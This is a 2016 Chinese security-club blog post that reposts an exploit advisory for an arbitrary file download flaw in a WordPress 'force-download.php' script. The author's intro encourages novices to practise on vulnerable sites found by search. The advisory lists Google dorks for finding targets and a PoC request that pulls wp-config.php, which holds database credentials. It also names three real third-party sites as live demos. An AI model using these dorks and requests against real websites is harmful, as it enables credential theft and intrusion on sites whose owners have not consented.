󰅡收起

Yu1u Security Club

09
八月

WordPress force-download任意文件下载漏洞

作者: 雨路
分类: 黑客学院
发布时间: 2016-08-09 11:45

搜索出来还是有不少可以利用的,新手可以拿来练手任意下载漏洞

######################
# ____ _ ____ ____ ___ ____ _ ____ _
# __ _| __ ) / | _ / ___|_ _| _ | | |___ / |
# / / _ / _ | | | | | _ | || |_) | | __) | |
# > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| |
# /_/_____/_/ _____/ ____|___|_| ______|_____|_|
#
######################
# Exploit Title : WordPress force download Arbitrary File Download
# Dork 1 : inurl:force-download.php?file=wp-content/uploads
# Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=
# Vendor Homepage : http://elouai.com/force-download.php
# Tested on: [ BACKBOX]
# skype:xbadgirl21
# Date: 07/08/2016
# video Proof : https://www.youtube.com/watch?v=V3o_17be8zY
######################
# PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] http://localhost/force-download.php?file=wp-config.php
#
######################
# Live Demo
######################
# [!] https://www.quantumib.com/force-download.php?file=wp-config.php
# [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php
# [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

本文出自 Yu1u Security Club ,转载时请注明出处及相应链接。

本文永久链接: https://www.yu1u.org/post/150.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注